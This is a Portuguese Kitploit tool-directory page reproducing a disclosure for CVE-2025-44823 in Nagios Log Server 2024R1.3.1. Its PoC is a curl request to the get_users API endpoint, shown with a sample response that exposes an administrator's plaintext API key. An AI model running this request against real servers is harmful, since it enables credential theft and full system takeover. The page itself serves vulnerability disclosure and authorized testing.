Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-44823 — Exposição de Chave de API Autenticada no Nagios Log Server 2024R1.3.1 | Kitploit
Ferramentas/GitHubGitHub/skraft9/cve-2025-44823
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesAutenticaçãoSegurança de API
GitHubskraft9/cve-2025-44823

CVE-2025-44823

Exposição de Chave de API Autenticada no Nagios Log Server 2024R1.3.1

Ver Repositório
1há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exposição Autenticada de Chave de API no Nagios Log Server 2024R1.3.1

▶️ PoC Demo

ID do CVE: CVE-2025-44823

Data: 2025-04-02

Autores: Alex Tisdale, Seth Kraft

Site do Fornecedor: https://www.nagios.com/

Changelog do Fornecedor: https://www.nagios.com/changelog/#log-server

Link do Software: https://assets.nagios.com/downloads/nagios-log-server/versions.php

Versão: 2024R1.3.1 e anteriores

Testado Em: Nagios Log Server 2024R1.3.1 (configuração padrão, Ubuntu 20.04)

CWE: CWE-497

CVSS: 9.8 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Autorização

Apenas para pesquisa e testes autorizados. Não utilize contra sistemas sem permissão.

Descrição

Uma vulnerabilidade a nível de API no Nagios Log Server 2024R1.3.1 permite que qualquer utilizador com um token de API válido recupere uma lista completa de contas de utilizador juntamente com as suas chaves de API em texto simples, incluindo credenciais de administrador. Esta falha permite enumeração de utilizadores, escalada de privilégios e comprometimento total do sistema através do uso não autorizado de tokens expostos.

PoC

Passo 1: Aceder ao endpoint vulnerável

root@kitploit:~
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"

Exemplo de Resposta

root@kitploit:~
[
  {
    "name": "devadmin",
    "username": "devadmin",
    "email": "[email protected]",
    "apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
    "auth_type": "admin",
    ...
  }
]
Baixar ferramenta